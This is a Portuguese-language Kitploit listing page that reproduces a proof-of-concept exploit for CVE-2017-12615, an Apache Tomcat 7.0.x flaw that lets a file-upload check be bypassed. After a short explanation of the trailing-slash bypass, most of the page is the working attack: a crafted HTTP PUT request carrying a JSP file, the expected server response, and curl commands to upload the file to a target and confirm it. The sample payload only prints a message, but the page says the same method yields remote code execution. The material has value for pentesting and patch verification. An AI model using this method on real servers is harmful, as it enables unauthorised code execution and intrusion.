Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-12615 — POC Exploit para a vulnerabilidade PUT JSP CVE-2017-12615 do Apache Tomcat 7.0.x. | Kitploit
Ferramentas/GitHubGitHub/breaktoprotect/cve-2017-12615
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubbreaktoprotect/cve-2017-12615

CVE-2017-12615

POC Exploit para a vulnerabilidade PUT JSP CVE-2017-12615 do Apache Tomcat 7.0.x.

Ver Repositório
11221há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Em memória de Chia Junyuan (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

POC Exploit para Apache Tomcat 7.0.0 a 7.0.79 em execução no Windows; vulnerabilidade CVE-2017-12615 PUT JSP.

Descrição:

Por design, não é permitido enviar arquivos JSP via método PUT nos servidores Apache Tomcat. Esta é provavelmente uma medida de segurança para impedir que um invasor envie um shell JSP e obtenha execução remota de código no servidor. No entanto, devido a verificações insuficientes, um invasor poderia obter execução remota de código em servidores Tomcat 7.0.{0 a 79} que tenham o PUT habilitado, enviando uma requisição do método PUT ao servidor Tomcat usando uma requisição HTTP especialmente criada. Mas sério, especial? Por favor.

Método de exploração:

Ao acrescentar um caractere '/' após a extensão do nome do arquivo, é possível contornar a verificação da extensão do arquivo. É só isso. Então, não é tão especial assim.

Exploit em um método de requisição:

Requisição

root@kitploit:~
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

Resposta esperada em caso de sucesso

root@kitploit:~
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

Exploit usando 'curl':

  1. Crie um arquivo .jsp (por exemplo, test.jsp):
root@kitploit:~
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. Execute o comando curl no servidor de destino:
root@kitploit:~
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. Verifique se o seu arquivo foi enviado acessando o endereço de destino ou:
root@kitploit:~
curl http://target-host-or-ip-address:port/test.jsp
Baixar ferramenta